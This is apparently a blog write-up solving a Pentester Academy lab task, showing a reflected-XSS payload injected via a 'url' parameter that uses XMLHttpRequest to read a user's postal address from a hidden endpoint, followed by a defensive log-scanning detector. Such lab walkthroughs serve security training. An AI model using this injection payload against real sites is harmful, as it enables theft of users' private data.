Javascript for Pentester Task 18

Hello Internet people, today I am going to post another solution to a task from Javascript for Pentester at Pentester Academy. This task is just the advanced version of task 14. In this task, we learn how to use the XMLHttpRequest method to fetch data and parse it on the fly without the user's knowledge. You can view solutions to the other tasks here.

Task 18: HTML Parsing of XMLHttpRequest Response  | TASK LINK

The task is to find John's postal address using an XSS vulnerability on that page. This task is the same as task 14, but here we have to fetch John's postal address directly from the link provided in the comment (see the solution part). This task is of moderate level; you need to know the XMLHttpRequest method, its syntax and how to use it.
Solution:
The injection point is the same as in the previous tasks: the url parameter. You can apply some test injections to verify that. While viewing the source code you will encounter this comment: "Address can be obtained via a GET request to /lab/webapp/jfp/18/address", which may have been left by the developer. Type the complete URL "http://pentesteracademylab.appspot.com/lab/webapp/jfp/18/address" into the URL bar and you will see John's postal address.

<script>
// Create the request object.
var req = new XMLHttpRequest();
req.onreadystatechange = function(){
  // Only act once the response is complete (readyState 4) and successful (HTTP 200).
  if (this.status == 200 && this.readyState == 4)
  {
    // With responseType = 'document', responseXML holds the parsed DOM of the response.
    var data = this.responseXML;
    // Grab the markup of the address element from the fetched page...
    var address = data.getElementById('address').innerHTML;
    // ...and write it into the result div on the current page.
    document.getElementById('result').innerHTML = address;
  }
};
// Asynchronous GET to the URL mentioned in the developer's comment.
req.open('GET','http://pentesteracademylab.appspot.com/lab/webapp/jfp/18/address',true);
// Ask the browser to parse the response as a Document so getElementById works on it.
req.responseType = 'document';
req.send();
</script>

This code creates an XMLHttpRequest to the commented link, retrieves the response as a parsed document, grabs the contents of the element with id="address" and puts them into the div with id="result". Copy and URL-encode the code and paste it after the 'url' parameter on the same page. Remember that req.responseType = 'document' is important: it makes the browser parse the response into a Document so we can run our further operations on it.
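From the defender's side, the same payload shows up in the server's access log as a URL-encoded url parameter. The following is an added example (not part of the original post or the lab): a small Node.js detector that decodes the url parameter from constructed Common Log Format lines and flags script tags and XMLHttpRequest usage; the log lines, IP addresses and regex list are assumptions.

```javascript
// Added example: scan web-server access-log lines for a script payload
// delivered through the `url` query parameter. Constructed data only.

// Patterns that are suspicious inside a value meant to hold a plain URL.
const SUSPICIOUS = [
  /<\s*script\b/i,      // an injected script element
  /XMLHttpRequest/i,    // in-page data fetch, as in the walkthrough
  /responseType\s*=/i,  // response parsing set up by the injected script
  /\bon\w+\s*=/i,       // inline event handlers (onerror=, onload=, ...)
];

// Pull the raw query string out of a Common Log Format request line.
function extractQuery(logLine) {
  const m = logLine.match(/"(?:GET|POST)\s+[^\s?]*\?([^\s"]*)/);
  return m ? m[1] : null;
}

// Decode one query parameter, tolerating malformed percent-encoding.
function getParam(query, name) {
  for (const pair of query.split('&')) {
    const [k, ...rest] = pair.split('=');
    if (k !== name) continue;
    const raw = rest.join('=').replace(/\+/g, ' ');
    try { return decodeURIComponent(raw); } catch (e) { return raw; }
  }
  return null;
}

// Return the sources of the patterns that matched (empty array = clean).
function scanLine(logLine) {
  const query = extractQuery(logLine);
  if (!query) return [];
  const value = getParam(query, 'url');
  if (value === null) return [];
  return SUSPICIOUS.filter(re => re.test(value)).map(re => re.source);
}

// Report only the lines that triggered at least one pattern.
function scanLog(lines) {
  return lines.map((line, i) => ({ line: i + 1, hits: scanLine(line) }))
              .filter(r => r.hits.length > 0);
}

// Constructed sample log lines (not real traffic).
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /lab/webapp/jfp/18?url=http://example.com HTTP/1.1" 200 512',
  '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /lab/webapp/jfp/18?url=%3Cscript%3Evar%20req%3Dnew%20XMLHttpRequest()%3B%3C%2Fscript%3E HTTP/1.1" 200 640',
  '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /lab/webapp/jfp/18/address HTTP/1.1" 200 128',
];

console.log(scanLog(SAMPLE_LOG));
```

Only the second constructed line is reported, with both the script tag and the XMLHttpRequest pattern as hits; the proper fix on the server remains HTML-encoding the url parameter before it is reflected.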
Refer to this post as a quick solution to the Javascript for Pentester tasks. For in-depth video tutorials, please refer to the video solutions provided on the Pentester Academy website.